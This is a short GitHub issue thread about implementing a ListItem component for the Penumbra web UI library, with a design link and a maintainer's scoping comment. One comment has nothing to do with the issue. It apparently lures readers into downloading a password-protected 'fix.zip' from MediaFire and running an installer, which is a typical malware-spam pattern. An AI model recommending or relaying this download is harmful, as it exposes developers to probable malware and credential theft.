### ISSUE TITLE
Uiv2 ListItem

### ISSUE THREAD

**Issue by grod220** [penumbra-zone/web#1731]
Designs: https://www.figma.com/design/WKgXSVVK3L0EI0sr9Hwjoa/penumbra-UI-library?node-id=400-31025&m=dev

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by VanishMax** [comment]
@vacekj List item is only going to be used within the AssetsSelector, so it should probably be implemented in #1714
